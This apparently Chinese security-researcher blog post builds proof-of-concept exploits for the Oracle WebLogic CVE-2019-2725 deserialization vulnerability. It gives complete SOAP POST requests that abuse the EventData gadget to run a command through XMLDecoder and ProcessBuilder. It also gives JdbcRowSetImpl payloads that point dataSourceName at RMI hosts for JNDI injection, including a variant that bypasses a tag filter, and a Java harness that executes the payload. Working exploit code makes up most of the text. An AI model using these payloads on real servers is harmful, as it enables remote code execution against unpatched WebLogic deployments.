# CVE-2019-2725二次反序列化EventData Gadget POC/JdbcRowSetImpl POC构造
CVE-2019-2725二次反序列化EventData Gadget POC
构造MapMsgEntity POC时会爆如下错误,原因畅师傅已经说了,当前类不是public
具体想跟一下怎么报错的,可以这样操作,报错代码如下:
java.lang.NoSuchMethodException: <unbound>=Class.new(byteArray);
全局搜索NoSuchMethodException,直到执行到这个地方,从调用栈回溯,追踪一下就ok了。
漏洞代码如下:
POC如下,不知道EventData类传递string类型的参数怎么写。怼出如下数据包了,能够执行命令,这里是一个坑点,还得看下大佬怎么构造的poc
POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 885
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>org.slf4j.ext.EventData</string><void>
<array class="java.lang.String" length="1">
<void index="0">
<string>"<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>"</string>
</void>
</array>
</void></class>
</java>
</work:WorkContext>
</soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
运行如下代码就能执行命令
package weblogic;
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;
public class Test {
//ByteArrayInputStream本身操作的是一个数组,并没有打开文件描述之类的,所有不需要关闭流
public static void main(String[] args) {
ByteArrayInputStream bais=null;
StringBuilder sb=new StringBuilder();
int temp=0;
int num=0;
long date1=System.currentTimeMillis();
try{
//bais也就是我们构造好的payload
bais=new ByteArrayInputStream("<java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\"><object class=\"java.lang.ProcessBuilder\"><array class=\"java.lang.String\" length=\"1\"><void index=\"0\"><string>calc</string></void></array><void method=\"start\" /></object></java>".getBytes());
XMLDecoder decoder = new XMLDecoder(bais);
decoder.readObject();
while((temp=bais.read())!=-1){
sb.append((char)temp);
num++;
}
System.out.println(sb);
System.out.println("读取的字节数:"+num);
}finally{
try{
bais.close();//不需要关闭流的,但是调用close没有任何影响,close不做任何事情
}catch(IOException e){
e.printStackTrace();
}
new File("d:"+File.separator+"a.txt");//File.separator是一个文件分隔符,在windows和linux平台下运行都没有问题
}
long date2=System.currentTimeMillis();
System.out.println("耗时:"+(date2-date1));
}
}
调试的时候发现代码执行不到.
真的很迷,上面poc怎么弹的计算器都不知道。最终Poc如下,原来参数可以放在这里<void><string><![CDATA[POC]]></string></void>
:
POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 801
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>]]></string>
</void></class>
</java>
</work:WorkContext>
</soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
代码最终来到这里,RCE.
还有com.sun.rowset.JdbcRowSetImpl类最后一个POC编写,一定要搞出来啊。
CVE-2019-2725二次反序列化JdbcRowSetImpl Gadget POC构造
jdk1.6没有property标签,jdk 1.7以上可以使用。因为绕过需要用到property标签赋值,只能用于weblogic12版本,weblogic10.3.6版本会爆如下错误:
java.lang.Exception: Unrecognized opening tag: property name="dataSourceName"
Continuing ...
java.lang.Exception: Unrecognized closing tag: property
Continuing ...
java.lang.Exception: Unrecognized opening tag: property name="autoCommit"
Continuing ...
java.lang.Exception: Unrecognized closing tag: property
Continuing ...
java.lang.NoSuchMethodException: <unbound>=Class.new("rmi://localhost:9999/aa", Boolean);
POC如下:
POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 694
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>com.sun.rowset.JdbcRowSetImpl</string><void>
<property name="dataSourceName"><string>rmi://localhost:9999/aa</string></property><property name="autoCommit"><boolean>true</boolean></property>
</void></class>
</java>
</work:WorkContext>
</soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
property标签代替<void property="">
之前的POC
<void class="com.sun.rowset.JdbcRowSetImpl">
<void property="dataSourceName">
<string>rmi://121.195.170.127:2222/aa</string>
</void>
<void property="autoCommit">
<boolean>true</boolean>
</void>
</void>
</java>
绕过的POC
<java>
<class>
<string>com.sun.rowset.JdbcRowSetImpl</string>
<void>
<property name="dataSourceName"><string>rmi://localhost:9999/aa</string>
</property>
<property name="autoCommit">
<boolean>true</boolean>
</property>
</void>
</class>
</java>
漏洞就不调试了,看我之前写过的https://www.cnblogs.com/afanti/p/10222293.html
参考链接:
https://paper.seebug.org/909/
给XML的property属性赋value